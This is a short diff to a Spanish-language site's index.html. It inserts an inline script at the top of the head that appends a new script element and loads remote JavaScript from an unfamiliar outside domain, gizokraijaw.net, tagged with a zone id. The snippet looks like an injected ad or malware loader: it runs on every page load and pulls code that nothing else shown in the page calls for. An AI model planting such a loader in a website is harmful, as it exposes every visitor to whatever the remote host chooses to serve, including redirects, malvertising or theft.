--- a/index.html
+++ b/index.html
@@ -3,8 +3,9 @@
 <html lang="es">
 
 <head>
-
-    <meta charset="UTF-8">
+<script>(function(s){s.dataset.zone='10374834',s.src='https://gizokraijaw.net/vignette.min.js'})([document.documentElement, document.body].filter(Boolean).pop().appendChild(document.createElement('script')))</script>
+   
+	<meta charset="UTF-8">
 
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
 
